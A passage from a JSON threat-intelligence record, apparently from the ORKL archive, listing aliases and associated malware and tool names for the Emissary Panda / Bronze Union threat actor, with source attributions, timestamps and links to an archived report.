				"Group 35",
				"Iron Taurus",
				"Iron Tiger",
				"Linen Typhoon",
				"LuckyMouse",
				"Operation DRBControl",
				"Operation Iron Tiger",
				"Operation PZChao",
				"Operation SpoiledLegacy",
				"Operation StealthyTrident",
				"Red Phoenix",
				"TEMP.Hippo",
				"TG-3390",
				"ZipToken"
			],
			"source_name": "ETDA:Emissary Panda",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"Agent.dhwf",
				"AngryRebel",
				"Antak",
				"CHINACHOPPER",
				"China Chopper",
				"Destroy RAT",
				"DestroyRAT",
				"FOCUSFJORD",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"HTTPBrowser",
				"HTran",
				"HUC Packet Transmit Tool",
				"HighShell",
				"HttpBrowser RAT",
				"HttpDump",
				"HyperBro",
				"HyperSSL",
				"HyperShell",
				"Kaba",
				"Korplug",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Mimikatz",
				"Moudour",
				"Mydoor",
				"Nishang",
				"OwaAuth",
				"PCRat",
				"PlugX",
				"ProcDump",
				"PsExec",
				"RedDelta",
				"SEASHARPEE",
				"Sensocode",
				"SinoChopper",
				"Sogu",
				"SysUpdate",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Token Control",
				"TokenControl",
				"TwoFace",
				"WCE",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Xamtrav",
				"ZXShell",
				"gsecdump",
				"luckyowa"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "236429ce-6355-43f6-9b58-e6803a1df3f4",
			"created_at": "2026-03-16T02:02:50.60344Z",
			"updated_at": "2026-04-10T02:00:03.641587Z",
			"deleted_at": null,
			"main_name": "Bronze Union",
			"aliases": [
				"Circle Typhoon ",
				"Emissary Panda "
			],
			"source_name": "Secureworks:Bronze Union",
			"tools": [
				"China Chopper",
				"OwaAuth",
				"Sysupdate"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775439101,
	"ts_updated_at": 1775792241,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/291c9f75be5db44e71d84666512d431a4cc5013b.pdf",
		"text": "https://archive.orkl.eu/291c9f75be5db44e71d84666512d431a4cc5013b.txt",
		"img": "https://archive.orkl.eu/291c9f75be5db44e71d84666512d431a4cc5013b.jpg"
	}
}